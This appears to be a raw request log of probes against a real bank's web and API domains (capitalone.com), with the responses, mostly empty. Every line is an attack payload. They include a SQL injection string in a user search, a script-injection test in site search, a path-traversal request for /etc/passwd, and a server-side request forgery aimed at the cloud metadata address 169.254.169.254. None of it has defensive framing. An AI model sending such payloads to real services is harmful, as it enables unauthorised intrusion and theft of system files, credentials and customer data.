===== URL: https://api.capitalone.com/users/search?query=' OR '1'='1 =====



===== URL: https://api.capitalone.com/accounts/12345/transactions =====
{"description":"Access forbidden. No CN/Api-Key available|No matching endpoint anonymous app","code":101305}



===== URL: https://www.capitalone.com/search?q=<script>alert(1)</script> =====



===== URL: https://secure.capitalone.com/download?file=../../etc/passwd =====



===== URL: https://internal.capitalone.com/proxy?url=http://169.254.169.254/latest/meta-data/ =====



